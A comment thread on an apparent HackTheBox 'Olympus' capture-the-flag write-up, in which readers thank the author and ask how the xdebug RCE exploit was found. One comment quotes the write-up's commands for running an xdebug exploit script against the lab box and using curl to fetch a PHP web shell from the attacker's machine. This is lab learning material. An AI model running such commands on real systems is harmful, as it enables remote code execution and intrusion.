Olympus WriteUp (English & Spanish)

https://ironhackers.es/en/writeups/writeup-olympus-hackthebox/

Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!

Lesson learned, thanks.

Thank you very much for your writeups.

May I ask you 2 questions:

…Question 1:

I wonder what keywords in Google you used to find this github.com link:
vulhub/php/xdebug-rce at master · vulhub/vulhub · GitHub

I tried these keywords in Google without success.
Google:
xdebug exploit
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug vulnerabilities
xdebug php exploit

…Question 2 has 2 sub questions:

You wrote in your writeup:

./xdebug-shell.py -u http://10.10.10.83

We upload a shell; from the obtained shell:

curl -O http://miIp/shell.php

…Is this “xdebug-shell.py” the code copied from

?

…I guess
miIp
means
the IP address of my Kali Linux?

Please advise.

Thanks a million.

I guess the keywords to search on google were:

php debug rce